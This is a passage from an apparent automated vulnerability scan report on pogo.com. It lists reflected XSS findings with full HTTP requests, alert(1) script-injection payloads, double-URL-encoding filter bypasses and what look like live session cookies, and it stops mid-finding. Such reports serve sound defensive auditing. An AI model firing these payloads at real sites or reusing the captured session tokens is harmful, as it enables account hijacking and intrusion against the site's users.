<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://www.pogo.com/?f9258%22%3E%3Cscript%3Ealert(document.cookied7809"><script>alert(1)</script>9c836ad6bee"/> ...[SNIP]...
3.602. http://www.pogo.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pogo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 575b9"><script>alert(1)</script>25a93ddaf89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie&575b9"><script>alert(1)</script>25a93ddaf89=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://www.pogo.com/?f9258%22%3E%3Cscript%3Ealert(document.cookie&575b9"><script>alert(1)</script>25a93ddaf89=1"/> ...[SNIP]...
3.603. http://www.pogo.com/account/my-account/recover.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.pogo.com
Path:
/account/my-account/recover.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fcb5"><a>43948eebdae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /account/my-account/recover.do?5fcb5"><a>43948eebdae=1 HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/account/verify-password.do Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536425818-New%7C1297128425818%3B
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://www.pogo.com/account/my-account/recover.do?5fcb5"><a>43948eebdae=1"/> ...[SNIP]...
3.604. http://www.pogo.com/action/pogo/createAccount.do [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pogo.com
Path:
/action/pogo/createAccount.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 152d8</script><script>alert(1)</script>35e94ca2073 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogo/createAccount.do?pageSection=header_reg&152d8</script><script>alert(1)</script>35e94ca2073=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c15b</script><script>alert(1)</script>11b14ca1e6d was submitted in the pageSection parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /action/pogo/createAccount.do?pageSection=header_reg1c15b</script><script>alert(1)</script>11b14ca1e6d HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2874%253c%252fscript%253e37c38751014 was submitted in the pageSection parameter. This input was echoed as c2874</script>37c38751014 in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /card-games?pageSection=categorybar_cardc2874%253c%252fscript%253e37c38751014 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the f9258%22%3E%3Cscript%3Ealert(1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10188"><script>alert(1)</script>130c5eaf7ce was submitted in the f9258%22%3E%3Cscript%3Ealert(1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /home/home.jsp?f9258%22%3E%3Cscript%3Ealert(110188"><script>alert(1)</script>130c5eaf7ce HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the f9258%22%3E%3Cscript%3Ealert(1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 971e1</script><script>alert(1)</script>9aa152ea55e was submitted in the f9258%22%3E%3Cscript%3Ealert(1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1971e1</script><script>alert(1)</script>9aa152ea55e HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';} s.tl(source,'o',pageName); } s.referrer="http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1971e1</script><script>alert(1)</script>9aa152ea55e"; s.eVar2="pogo"; s.pageName="Unauth Free Pogo Home Page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:::Unauth Free Pogo Home Page:Non Authenticated"; s.prop8="Non Authenticated"; if (typeof ...[SNIP]...
3.609. http://www.pogo.com/home/home.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pogo.com
Path:
/home/home.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9258"><script>alert(1)</script>4225969d669 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /home/home.jsp?f9258"><script>alert(1)</script>4225969d669=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://www.pogo.com/?f9258"><script>alert(1)</script>4225969d669=1"/> ...[SNIP]...
3.610. http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pogo.com
Path:
/hotdeploy/us/homepage/clubpogo-info.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a423</script><script>alert(1)</script>2d1ef703044 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hotdeploy/us/homepage/clubpogo-info.jsp?5a423</script><script>alert(1)</script>2d1ef703044=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-e ...[SNIP]... p6,' } } if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';} s.tl(source,'o',pageName); } s.referrer="http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp?5a423</script><script>alert(1)</script>2d1ef703044=1"; s.eVar2="pogo"; s.pageName="ClubPogo.com 5by5 0708 US page"; s.prop2="pogo"; s.channel="pogo"; s.prop7="POGO:pogo:marketing::ClubPogo.com 5by5 0708 US page:Non Authenticated"; s.prop8="Non Authent ...[SNIP]...
3.611. http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pogo.com
Path:
/hotdeploy/us/homepage/clubpogo-info.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eadd"><script>alert(1)</script>5428e23fbf7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /hotdeploy/us/homepage/clubpogo-info.jsp?9eadd"><script>alert(1)</script>5428e23fbf7=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the &intcmp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70262%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e02cc5d04880 was submitted in the &intcmp parameter. This input was echoed as 70262</script><script>alert(1)</script>02cc5d04880 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the &intcmp request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_170262%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e02cc5d04880&pageSection=free_home_mtx_shopping HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the intcmp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75c88%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e723870b2cf6 was submitted in the intcmp parameter. This input was echoed as 75c88</script><script>alert(1)</script>723870b2cf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the intcmp request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?intcmp=fp_mtx_mb_minis_275c88%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e723870b2cf6&pageSection=free_home_mtx_shopping HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c915%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4cf12ef1b83 was submitted in the pageSection parameter. This input was echoed as 3c915</script><script>alert(1)</script>4cf12ef1b83 in the application's response.
